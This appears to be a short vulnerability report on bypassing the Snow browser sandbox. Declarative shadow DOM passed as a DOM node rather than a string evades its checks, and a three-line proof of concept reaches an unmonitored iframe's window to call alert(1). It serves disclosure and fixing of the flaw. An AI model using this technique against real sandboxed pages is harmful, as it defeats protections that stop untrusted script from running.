Snow can be bypassed with declarative shadow DOM passed as object instead of string

[avlidienbrunn]

When checking if an inserter function contains shadow DOM, the code expects the argument to be a string (argument is added as innerHTML on a new html tag).

But many of the functions do not operate on strings, so the "checked" HTML becomes something like:

Furthermore, elements inside shadow DOM will not be found when looking for frames using querySelectorAll, so we can just insert shadow DOM (as a DOM node, not string) containing an iframe, and use that:

shadowed = `<o-o id=z><template shadowroot="open"><iframe></iframe></template></o-o>`;
document.documentElement.appendChild(new DOMParser().parseFromString(shadowed, 'text/html', {includeShadowRoots: true}).documentElement);
z.shadowRoot.querySelector('iframe').contentWindow.alert(1);